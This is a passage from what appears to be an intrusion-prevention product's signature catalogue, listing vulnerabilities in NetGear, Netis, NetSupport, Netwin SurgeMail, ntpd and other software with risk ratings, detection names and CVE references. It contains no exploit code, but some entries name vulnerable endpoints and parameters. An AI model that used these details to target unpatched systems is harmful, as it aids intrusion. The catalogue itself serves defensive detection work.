Description: Improper input validation for the getNodesByTopologyMapSearch component causes an SQL injection vulnerability in Netgear ProSAFE NMS300. A successful exploit allows an attacker to execute arbitary SQL and possibly even arbitrary code on the target system. This situation also covers attempts to exploit CVE-2023-44450, which was issued to address the failed patch of CVE-2023-38099.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection
References:
CVE-2023-38099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38099
Back to top

NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal

About this vulnerability: A vulnerability in NetGear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: Improper validation of the realName parameter in MibController class causes a vulnerability in NetGear NMS300. A successful exploit allows an attacker to cause a denial of service condition.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal
References:
CVE-2021-27276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27276
Back to top

NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: Improper validation of request-URI in MyHandlerInterceptor class causes an authentication bypass vulnerability in Netgear NMS300. A succesful exploitation allows an attacker to gain access to restricted functionality on the target software.
Situation: HTTP_CSU-NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass
References:
CVE-2023-38096
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38096
Back to top

NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in NetGear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: Improper validation of the path parameter in the ReportTemplateController class of the management application causes an arbitrary deletion vulnerability in NetGear ProSAFE NMS300. A successful exploit allows a remote attacker to delete arbitrary files on the target system and cause a denial of service condition.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion
References:
CVE-2021-27272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27272
Back to top

NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the saveNodeLabel method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting
References:
CVE-2023-50231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50231
Back to top

NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection

About this vulnerability: A vulnerability in NetGear ProSAFE NMS300
Risk: Moderate
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: Improper validation of user-sent parameters in SettingConfigController class causes a command injection vulnerability in NetGearn NMS300. A successful exploit allows an attacker to execute arbitrarty commands on the target with system privileges.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection
References:
CVE-2021-27273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27273
Back to top

NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: High
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1777-5242
Platform: Generic
Software: NetGear NMS300
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported for Netgear ProSAFE NMS300. This vulnerability is due to improper input validation in the UpLoadServlet class. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.
Situation: HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal
References:
CVE-2024-5505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5505
Back to top

NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Netgear ProSAFE NMS300
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: NetGear NMS300
Type: Input Validation
Description: An unrestricted file upload vulnerability exists in Netgear ProSAFE NMS300. The vulnerability is due to improper validation of the uploaded file in the UpLoadServlet class. A remote, authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation would result in the code execution under the security context of SYSTEM.
Situation: HTTP_CS-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
HTTP_CRL-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
References:
CVE-2023-38098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38098
Back to top

NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919

About this vulnerability: A vulnerability in NetGear ProSAFE
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: NetGear
Type: Insecure Configuration
Description: NetGear ProSAFE Plus switches JGS516PE and GS116Ev2 with firmware version prior to 2.6.0.43 could allow unauthenticated attackers to execute arbitrary commands due to improper access controls.
Situation: HTTP_CRL-NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919
References:
CVE-2020-26919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26919
Back to top

NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset

About this vulnerability: A vulnerability in NetGear R6700v3 routers.
Risk: High
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Platform: Generic
Software: NetGear
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd) of NetGear R6700v3 routers, firmware versions before V1.0.4.94, which allows remote attackers to reset the Admin password back to its factory default of 'password'.
Situation: HTTP_CS-NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset
References:
CVE-2020-10924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10924
Back to top

NetGear-R7000-And-R6400-Cgi-Bin-Command-Injection

About this vulnerability: An attempt to exploit a NetGear R7000 and R6400 cgi-bin Command Injection vulnerability detected
Risk: High
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1770-5242
Platform: Linux
Software: NetGear
Type: Code Injection
Description: A vulnerability in NetGear R7000 and R6400 , firmware version 1.0.7.2_1.1.93, which allows remote attackers to execute arbitrary commands via the path info to cgi-bin.
Situation: HTTP_CSU-Cgi-Bin-Command-Injection
HTTP_CSU-NetGear-R7000-And-R6400-Command-Injection-Enable-Telnet
References:
CVE-2016-6277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6277
Back to top

NetGear-RAX43-Command-Injection-CVE-2021-20167

About this vulnerability: A vulnerability in NetGear RAX43 router
Risk: High
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: NetGear
Type: Input Validation
Description: A command injection vulnerability has been reported in NetGear RAX43 router firmware.
Situation: HTTP_CRL-NetGear-RAX43-Command-Injection-CVE-2021-20167
References:
CVE-2021-20167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20167
Back to top

NetGear-ReadyNAS-Perl-Code-Injection

About this vulnerability: A NetGear ReadyNAS Perl Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NETGEAR ReadyNAS
Type: Code Injection
Description: A vulnerability in NETGEAR ReadyNAS, firmware versions 4.2.23 and 4.1.11, which allows remote attackers to execute arbitrary Perl code via a vrafted request.
Situation: HTTP_CSU-NetGear-ReadyNAS-Perl-Code-Injection
References:
CVE-2013-2751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2751
OSVDB-98826
http://www.osvdb.org/98826
Back to top

NetGear-SSL312-Cgi-Binary-DoS

About this vulnerability: A Denial of Service vulnerability in NetGear
Risk: Low
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear SSL312
Type: Buffer Overflow
Description: Denial of Service vulnerability exists in NetGear SSL312. The vulnerability can be triggered by sending a directory traversal request into the admin http/https interface
Situation: HTTP_CSU-NetGear-SSL312-Cgi-DoS
References:
CVE-2009-0680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0680
BID-33675
http://www.securityfocus.com/bid/33675
Back to top

NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555

About this vulnerability: A vulnerability in NetGear
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: NetGear
Type: Input Validation
Description: NeatGear wireless access points WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, WNDAP660, and WN604 include various web pages that can allow an unauthenticated attacker to execute arbitrary commands.
Situation: HTTP_CRL-NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555
References:
CVE-2016-1555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1555
Back to top

NetGear-WNAP210-Remote-Password-Disclosure

About this vulnerability: A vulnerability in NetGeat WNAP210
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear WNAP210
Type: Malfunction
Description: There is a vulnerability in NetGear WNAP210 which may allow a remote unauthenticated attacker to retrieve the device's administrator password.
Situation: HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure
Back to top

NetGear-WNDAP350-Remote-Password-Disclosure

About this vulnerability: A vulnerability in NetGeat WNDAP350
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetGear WNDAP350
Type: Malfunction
Description: The Netgear WNDAP350 suffers from unauthorized information disclosure which allows a remote attacker to steal the administrator's credentials and other configuration information.
Situation: HTTP_CSU-NetGear-WNDAP350-Remote-Password-Disclosure
HTTP_CSU-NetGear-WNAP210-And-WNDAP350-Remote-Password-Disclosure
Back to top

Netikus-EventSentry-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5077

About this vulnerability: A vulnerability in Netikus EventSentry
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Netikus EventSentry
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability has been reported in Netikus EventSentry versions before 3.2.1.44. An unauthenticated attacker can use this vulnerability to execute arbitrary script content in the EventSentry web console via crafted SNMP trap messages.
Situation: SNMP-UDP_Cross-Site-Scripting-Via-SNMP-Trap
References:
CVE-2016-5077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5077
Back to top

NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in NetIQ Security Solutions for iSeries
Risk: Low
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetIQ Security Solutions for iSeries
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported in NetIQ Security Solutions for ISeries. The vulnerability is due to a stack buffer overflow in the NetIQExecObject.NetIQExec ActiveX Control when processing parameters to the SafeShellExecute function. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can lead to code execution in the context of the affected user.
Situation: File-Text_NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow
References:
CVE-2015-0795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0795
Back to top

Netis-Router-Backdoor

About this vulnerability: A known backdoor in Netis Routers
Risk: High
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: There exists a hardcoded password in Netis, Netcore, routers which allows remote attackers to bypass the device security and run arbitrary code.
Situation: Generic_UDP-Netis-Router-Backdoor
Back to top

Netis-Router-MW5360-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in the Netis MW5360 detected
Risk: High
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Platform: Linux
Software: Netis
Type: Input Validation
Description: A vulnerability in the the Netis MW5360 router, versions V1.0.1.3442 and before, which allows remote attackers to execute arbitrary commands via the password parameter, due to insufficient input validation.
Situation: HTTP_CRL-Netis-Router-MW5360-Unauthenticated-RCE
References:
CVE-2024-22729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22729
Back to top

Netis-Router-Unauthenticated-Password-Change

About this vulnerability: A vulnerability in Netis routers
Risk: Moderate
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Generic
Software: Netis
Type: Input Validation
Description: Improper validation of requests to API endpoints causes an unauthenticated password change vulnerability in Netis routers. A successful exploitation allows an attacker to access privileged functionality on the target system.
Situation: HTTP_CRL-Netis-Router-Unauthenticated-Password-Change
References:
CVE-2024-48456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48456
Back to top

Netis-WF2419-Remote-Code-Execution-CVE-2019-19356

About this vulnerability: A vulnerability in Netis WF2419
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: Netis
Type: Input Validation
Description: Netis WF2419 wireless router could allow authenticated attackers to execute arbitrary commands due to insufficient validation of user input.
Situation: HTTP_CRL-Netis-WF2419-Remote-Code-Execution-CVE-2019-19356
References:
CVE-2019-19356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19356
Back to top

Netlink-GPON-Router-Remote-Code-Execution

About this vulnerability: A vulnerability in Netlink GPON Router 1.0.11
Risk: High
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Generic
Software: Netlink
Type: Input Validation
Description: An attempt to exploit a vulnerability in Netlink GPON Router 1.0.11 detected.
Situation: HTTP_CRL-Netlink-GPON-Router-Remote-Code-Execution
Back to top

NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in NetMechanica NetDecision HTTP Server detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NetMechanica NetDecision
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in NetMechanica NetDecision HTTP Server, before version 4.6.1, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a long URL in an HTTP request.
Situation: HTTP_CSU-NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow
References:
CVE-2012-1465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1465
BID-52194
http://www.securityfocus.com/bid/52194
OSVDB-79651
http://www.osvdb.org/79651
Back to top

NetMotion-Mobility-Server-MvcUtil-Java-Deserialization

About this vulnerability: A vulnerability in NetMotion Mobility Server.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Windows
Software: NetMotion Mobility Server
Type: Input Validation
Description: A vulnerability in NetMotion Mobility Server, versions 11.x before 11.73 and 12.x before 12.02, which allows remote attackers to execute arbitrary code through the /mobility/Menu/isLoggedOn endpoint, due to a Java deserialization in the server's MvcUtil.valueStringToObject() method.
Situation: HTTP_CS-NetMotion-Mobility-Server-MvcUtil-Java-Deserialization
References:
CVE-2021-26914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26914
Back to top

NetObserve-Authentication-Bypass

About this vulnerability: A vulnerability in NetObserve
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetObserve
Type: Malfunction
Description: The NetObserve software does not correctly validate whether or not a user is allowed to connect to the remote NetObserve service. Therefore a client without privileges, using a carefully crafted HTTP request, can connect to the remote service with escalated credentials.
Situation: HTTP_CSU-NetObserve-Authentication-Bypass
References:
BID-9319
http://www.securityfocus.com/bid/9319
Back to top

NetRisk-Remote-File-Inclusion

About this vulnerability: Remote file inclusion Vulnerability in NetRisk
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: NetRisk
Type: Input Validation
Description: There is a remote file inclusion vulnerability in NetRisk muliplayer online game written in PHP scripting language. NetRisk does not validate parameters given to the script correctly, allowing injection and execution of arbitary code into the context of the web server.
References:
CVE-2008-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0144
BID-27136
http://www.securityfocus.com/bid/27136
Back to top

Netscape-Es-Dir-Disclosure

About this vulnerability: Netscape Enterprise Server directory listing
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Unix
Software: Netscape Enterprise Server
Type: Insecure Configuration
Description: If the Directory Indexing is enabled in Netscape Enterprise Server, a vulnerability allows for a remote attacker to list the server directories using the Web publishing (?wp-) tags.
Situation: HTTP_CSU-Netscape-Es-Wp-Access
References:
CVE-2000-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0236
BID-1063
http://www.securityfocus.com/bid/1063
Back to top

Netscape-Network-Security-Services-Library-Heap-Overflow

About this vulnerability: Heap-based buffer overflow in Netscape NSS library
Risk: Low
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netscape Enterprise Server;Sun ONE Web Server
Type: Buffer Overflow
Description: Netscape Network Security Services (NSS) library has a remote heap overflow vulnerability. This issue arises due to insufficient boundary checks for the record length field in an SSLv2 client hello message. Successful exploitation of this issue may result in denial of service or execution of arbitrary code on the system with the Web server privileges. The NSS library is commonly used by Netscape Enterprise Server and Sun One/iPlanet servers. The SSLv2 protocol is not enabled by default on these servers. Other products may be affected as well.
Situation: HTTPS_CS-Netscape-Network-Security-Services-Library-SSLv2-Buffer-Overflow
References:
CVE-2004-0826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826
BID-11015
http://www.securityfocus.com/bid/11015
OSVDB-10198
http://www.osvdb.org/10198
OSVDB-10199
http://www.osvdb.org/10199
Back to top

Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Netscape NSS
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla NSS
Type: Buffer Overflow
Description: A vulnerability exists in Netscape Network Security Services (NSS) library's SSLv2 message parsing routines. A malformed Client Hello message with excessively large Challenge Data could overwrite a memory buffer allocated on the heap. It is possible to perform attacks, without valid credentials, on a vulnerable web server with SSLv2 support enabled that would result in a denial of service or remote code execution.
Situation: HTTPS_CS-Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow
Back to top

Netshagg

About this vulnerability: NetShagg
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NetShagg
Type: Code Injection
Description: NetShagg is a spyware that installs additional unwanted programs on the infected machine.
Situation: HTTP_CSH-Netshagg
Back to top

NetSupport-Manager-Client-Buffer-Overflow

About this vulnerability: A vulnerability in NetSupport Manager
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Mac OS X; Solaris
Software: NetSupport Manager
Type: Buffer Overflow
Description: There is a vulnerability in NetSupport Manager client daemon process. The vulnerability is due to a boundary error while handling remote handshake messages on port 5405/TCP. Remote attackers could exploit this vulnerability by sending a malicious request to the target client service. Successful exploitation would cause injection and execution of arbitrary code in the context of root user.
Situation: Generic_CS-NetSupport-Manager-Client-Buffer-Overflow
References:
CVE-2011-0404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0404
BID-45728
http://www.securityfocus.com/bid/45728
OSVDB-70408
http://www.osvdb.org/70408
Back to top

NetSupport-RAT-Infection-Traffic

About this vulnerability: NetSupport RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NetSupport RAT infection traffic was detected.
Situation: HTTP_CS-NetSupport-RAT-Infection-Traffic
Back to top

Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection

About this vulnerability: A vulnerability in Netsweeper WebAdmin
Risk: High
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Platform: Generic
Software: Netsweeper WebAdmin
Type: Input Validation
Description: There exists a vulnerability in Netsweeper WebAdmin, versions 6.4.3 and 6.4.4, which allows remote attackers to execute arbitrary Python code through the password parameter to unixlogin.php when using specific Referer headers, due to insufficient validation of user input.
Situation: HTTP_CS-Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection
References:
CVE-2020-13167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13167
Back to top

Netwin-Dmail-Etrn-BOF

About this vulnerability: DMail Etrn Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetWin DMail
Type: Buffer Overflow
Description: A remote exploitable Buffer Overflow in ETRN argument processing allows remote root compromise if successfully exploited.
Situation: SMTP_Etrn-BO-1
SMTP_X86-ShellCode-1
References:
CVE-2000-0490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0490
BID-1297
http://www.securityfocus.com/bid/1297
Back to top

Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow

About this vulnerability: Denial of service vulnerability in NetWin SurgeMail
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netwin SurgeMail
Type: Malfunction
Description: Stack-based buffer overflow in the IMAP service in NetWin SurgeMail 38k4-4 and earlier allows remote authenticated users to execute arbitrary code via long arguments to the LSUB command.
Situation: IMAP_CS-Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow
References:
CVE-2008-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1497
BID-28377
http://www.securityfocus.com/bid/28377
OSVDB-43852
http://www.osvdb.org/43852
Back to top

Netwin-SurgeMail-Webmail-Format-String

About this vulnerability: Format String vulnerability in Netwin's SurgeMail Webmail interface
Risk: High
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netwin SurgeMail
Type: Format String
Description: A format string vulnerability exists in the NetWin SurgeMail 38k4 and earlier and beta 39a, and WebMail 3.1s and earlier. The Vulnerability allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request to webmail.exe.
Situation: HTTP_CSU-Netwin-SurgeMail-Webmail-Format-String
References:
CVE-2008-1055
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1055
BID-27990
http://www.securityfocus.com/bid/27990
Back to top

Netwin-SurgeMail-Webmail-Multiple-Header-Memory-Corruption

About this vulnerability: Buffer overflow in Netwin's SurgeMail Webmail interface
Risk: High
First detected in: sgpkg-ips-341-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netwin SurgeMail
Type: Buffer Overflow
Description: A stack-based buffer overflow exists in the NetWin SurgeMail 38k4 and earlier, and beta 39a. The Vulnerability allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request with multiple long headers to webmail.exe.
Situation: HTTP_CS-Netwin-SurgeMail-Header-Line-BOF
References:
CVE-2008-1054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1054
BID-27992
http://www.securityfocus.com/bid/27992
Back to top

NetWire-RAT-Infection-Traffic

About this vulnerability: NetWire RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NetWire RAT infection traffic was detected.
Situation: Generic_CS-NetWire-RAT-Infection-Traffic
Back to top

Network-Associates-PGP-Keyserver-Buffer-Overflow

About this vulnerability: A Network Associates PGP Keyserver Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Network Associates PGP Keyserver
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Network Associates PGP Keyserver, version 7.0, which allows remote attackers to cause a denial of service condition or execute arbitrary code via exceptional BER encodings.
Situation: LDAP_CS-Network-Associates-PGP-Keyserver-Buffer-Overflow
References:
CVE-2001-1320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1320
BID-3046
http://www.securityfocus.com/bid/3046
OSVDB-4742
http://www.osvdb.org/4742
Back to top

Network-Time-Protocol-Daemon-Configure-Buffer-Overflow

About this vulnerability: A vulnerability in ntp.org NTP
Risk: High
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Network Time Protocol daemon (NTPD). The vulnerability is due to insufficient checks on an input size prior to a copy operation in the configure() function. A remote privileged attacker could exploit this vulnerability by sending a crafted NTP request to the vulnerable service. Successful exploitation could result in arbitrary code execution with the privilege level of the ntpd process.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Configure-Buffer-Overflow
References:
CVE-2014-9295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295
BID-71761
http://www.securityfocus.com/bid/71761
OSVDB-116068
http://www.osvdb.org/116068
Back to top

Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the Network Time Protocol daemon (NTPD). The vulnerability is due to insufficient checks on an input size prior to a copy operation in the ctl_putdata() function. A remote privileged attacker could exploit this vulnerability by sending a crafted NTP request to the vulnerable service. Successful exploitation could result in arbitrary code execution with the privilege level of the ntpd process.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow
References:
CVE-2014-9295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295
BID-71761
http://www.securityfocus.com/bid/71761
OSVDB-116067
http://www.osvdb.org/116067
Back to top

Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass

About this vulnerability: A vulnerability in NTP
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: There exists an authentication bypass vulnerability in the Network Time Protocol daemon (NTPD). A remote attacker can use this to modify the time on the target system, which can lead to several exploitations including policy bypass.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass
References:
CVE-2015-7871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871
Back to top

Network-Time-Protocol-Daemon-Crypto-nak-Denial-Of-Service

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: A vulnerability in the Network Time Protocol daemon (NTPD), versions 4.2.8p7 and 4.3.92, which allows remote attackers to cause a denial of service condition, due to a null pointer dereference when handling crypto-NAK packets.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass
References:
CVE-2016-4957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4957
Back to top

Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: The Network Time Protocol daemon can be exploited in a way that leads to a denial of service condition by sending crafted packets.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure
References:
CVE-2015-7855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855
Back to top

Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: Insufficient input validation on the mode parameter in peer_xmit() causes a vulnerability in ntp.org NTPd. A successful exploit can cause a denial of service condition.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service
References:
CVE-2017-6464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6464
Back to top

Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
